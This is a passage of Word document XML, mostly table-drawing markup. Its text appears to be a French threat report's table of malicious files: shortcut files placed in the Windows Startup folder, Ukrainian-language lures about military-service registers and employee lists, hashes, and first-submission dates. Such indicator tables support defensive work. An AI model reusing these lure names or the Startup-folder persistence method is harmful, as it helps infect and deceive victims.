                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="4242434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="4242434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="4242434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="4242434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="4242434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4242434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="3358514"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3358514"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="3358514"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="3358514"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="3358514"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="3358514"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3358514"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="3358514"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3358514"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="2298064"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2298064"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="2298064"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="2298064"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="2298064"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="2298064"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2298064"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="2298064"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2298064"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="1237615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1237615"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="1237615"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="1237615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="1237615"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="1237615"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1237615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="1237615"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1237615"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="353695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="353695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="353695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="353695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="353695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="35369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3968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697865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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6978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697865">
                          <a:moveTo>
                            <a:pt x="4749799" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69786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6323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1689109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="7728584"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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77285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7728584">
                          <a:moveTo>
                            <a:pt x="0" y="6176645"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6176645"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7728584"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7728584"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6176645"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6016625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6016625"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6176645"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6176645"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6016625"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="6010275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6010275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="6010275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="6010275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="6010275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="6010275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="6010275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="6010275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6010275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="5126355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5126355"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="5126355"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="5126355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="5126355"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="5126355"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="5126355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="5126355"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5126355"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="4242434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4242434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="4242434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="4242434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="4242434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="4242434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="4242434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="4242434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4242434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="3358514"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3358514"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="3358514"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="3358514"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="3358514"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="3358514"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3358514"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="3358514"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3358514"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="2298064"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2298064"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="2298064"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="2298064"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="2298064"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="2298064"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2298064"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="2298064"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1238249"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2298064"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="1237615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1237615"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="1237615"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="1237615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="1237615"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="1237615"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1237615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="1237615"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="354330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1237615"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="353695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="353695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="353695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="353695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="353695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="35369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3472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34050" cy="6715760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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050" cy="67157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050" h="6715760">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="6715760"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6712584"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="6712584"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5828665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5828665"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4944744"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4944744"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4060825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4060825"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3000375"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3000375"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1939924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1939924"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1056004"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1056004"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="701674"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="701674"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="57340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4496" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2399030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="6703059"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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67030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6703059">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="670305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6544" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5650230</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="977903" cy="6715760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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7903" cy="67157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77900" h="6715760">
                          <a:moveTo>
                            <a:pt x="977900" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="977900" y="6715760"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="670940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3712" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4936490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7980689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1427479" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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747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747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1426844" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1426844" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="142747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473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4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576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4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6784" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5887720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="579003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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0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Date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7808" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3536314</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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30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Nom du fichier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8832" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1006474</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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91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Condensat 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9856" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5845175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="664728" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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72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première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0880" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5751830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1348763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="811871" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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8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soumission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1904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1693810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179502" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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950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Menu_Programs_Startup_U0asnHrRyNSI5H4.lnk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29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2048140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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1ebbdf3671cd5ca25a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3952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2136405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3180734" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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07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1070</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle34"/>
                            <w:spacing w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve">26782818.pdf:..</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle83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 .._.._Roaming_Micr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49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2224670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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8a8e7ca2f6e46dd22c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600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2312935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1572037" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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203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osoft_Windows_Start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7024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2320313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="804371" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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37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28 mai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80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2401200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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631e01bfcc5c909ae2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9072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2489465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2949416" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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941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Menu_Programs_Startup_U061m7RlE5py.lnk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00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2577730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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fd680bf458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112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2932060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3294157" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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415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Відомості з реєстру військовозобов'язаних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21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3020325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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f668bd551859007cf2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316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3108590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3212890" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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289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про працівників №20260409-7496423-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41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3196855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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cc2a62bf0bf5414870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521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3285120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3178917" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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89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1.pdf:..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.._Roaming_Microsoft_Window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6240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3292498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757711" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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71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9 avril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72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3373385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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a04e9782590c9bf85c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828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3461650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="650017" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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0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93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3549915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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849ddb308b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033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3638180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179502" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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950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Menu_Programs_Startup_ojMP31J28ohEDxT.lnk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136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3992510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3294157" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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415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Відомості з реєстру військовозобов'язаних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23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4080775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
